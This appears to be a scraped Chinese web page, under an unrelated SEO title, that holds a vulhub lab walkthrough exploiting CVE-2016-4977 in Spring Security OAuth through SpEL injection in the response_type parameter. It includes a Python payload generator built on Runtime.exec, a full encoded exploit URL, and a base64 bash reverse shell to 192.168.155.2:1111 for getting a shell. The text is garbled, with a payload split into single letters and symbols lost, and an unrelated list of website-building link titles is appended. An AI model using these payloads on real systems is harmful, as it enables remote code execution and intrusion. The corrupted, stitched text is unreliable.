当前位置: 首页 > news >正文

东莞整站优化排名展厅宣传片

news 2026/4/17 3:49:08
东莞整站优化排名,展厅宣传片,快速建站服务,设计电影完整版视频在线文章目录 一、搭建环境二、漏洞验证三、准备payload四、执行payload五、变形payload 一、搭建环境 cd vulhub/spring/CVE-2016-4977/ docker-compose up -d 二、漏洞验证 访问 http://192.168.10.171:8080/oauth/authorize?response_type${233*233}client_idacmes… 文章目录 一、搭建环境二、漏洞验证三、准备payload四、执行payload五、变形payload 一、搭建环境 cd vulhub/spring/CVE-2016-4977/ docker-compose up -d 二、漏洞验证 访问 http://192.168.10.171:8080/oauth/authorize?response_type${233*233}client_idacmescopeopenidredirect_urihttp://test 用admin:admin登陆 出现以下报错表示漏洞存在response_type里面的命令执行了 三、准备payload poc.py #!/usr/bin/env python message input(‘Enter message to encode:’) poc ‘${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)’ % ord(message[0]) for ch in message[1:]: poc ‘.concat(T(java.lang.Character).toString(%s))’ % ord(ch) poc ‘)}’ print(poc) python3 poc.py #输入要执行的命令会返回处理后的命令这里输入whoami 取出得到的输出 T ( j a v a . l a n g . R u n t i m e ) . g e t R u n t i m e ( ) . e x e c ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 119 ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 104 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 111 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 97 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 109 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 105 ) ) ) P a y l o a d : o a u t h / a u t h o r i z e ? r e s p o n s e t y p e {T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))} Payload:oauth/authorize?response_type T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))Payload:oauth/authorize?responset​ype{T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))}client_idacmescopeopenidredirect_urihttp://test 四、执行payload 返回了进程表示代码执行了但这没有回显是无回显RCE 五、变形payload 准备shell代码bash -i /dev/tcp/192.168.155.2/1111 01 转成base64YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ shellbash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ}|{base64,-d}|{bash,-i} Python poc.y获取输出 将上面的命令加入到response_type参数部分得到变形后的url 六、Getshell 开启监听 执行变形后的payload得到shell
http://www.hkea.cn/news/14296343/

相关文章:

  • 莱芜网站建设公众号建设兰州市城关区建设局网站
  • 有什么免费开发网站建设软件为企业规划一个网站
  • 地产平面网站中国安能建设集团有网站
  • 公司网站建设提纲沈阳妇科检查
  • 智慧园区建设总体方案苏州seo推广
  • 金乡县住房和城乡建设局网站二手商品网站制作
  • 建网站一条龙网站建设 网站专题 网络推广
  • 榆林免费做网站利尔化学股票
  • 移动营销型网站建设镇江营销型建站公叿
  • 昆明企业网站制作房地产微网站
  • 国泰君安建设工程官方网站一达通外贸综合服务平台
  • 有源码手机怎么搭建网站做一个网站的流程是什么
  • 无锡网站推广优化费用wordpress账号权限
  • 做网站的公司图wordpress 打赏实现
  • 搜狐视频网站联盟怎么做综合网站建设课程设计
  • 上海网站建设报沈阳城市建设学院信息与控制工程系
  • 国内常见的博客网站wordpress积分商城插件
  • 微信平台app网站建设台州网站制作报价
  • 商务网站建设管理思路南昌易动力网站建设公司
  • 自贡订房中心网站建设nas做视频网站
  • 网络推广网站推广方法网站做301将重定向到新域名
  • 青海省建设厅网站首页阿里云建网站步骤
  • 企联网站建设成都网站建制作
  • 提供邢台网站优化网站里怎样做点击量查询
  • 网站搭建 成都暴雪娱乐
  • 什么是网站建设需求分析网站制作div区域是哪儿
  • 网站开发上传视频教程2345网址导航怎么删除干净?
  • 安徽建设银行网站中国建设银行个人网站银行
  • 做论文常用网站社区类网站建设的例子
  • 中国建设银行官网站哈南分理处做预算的网站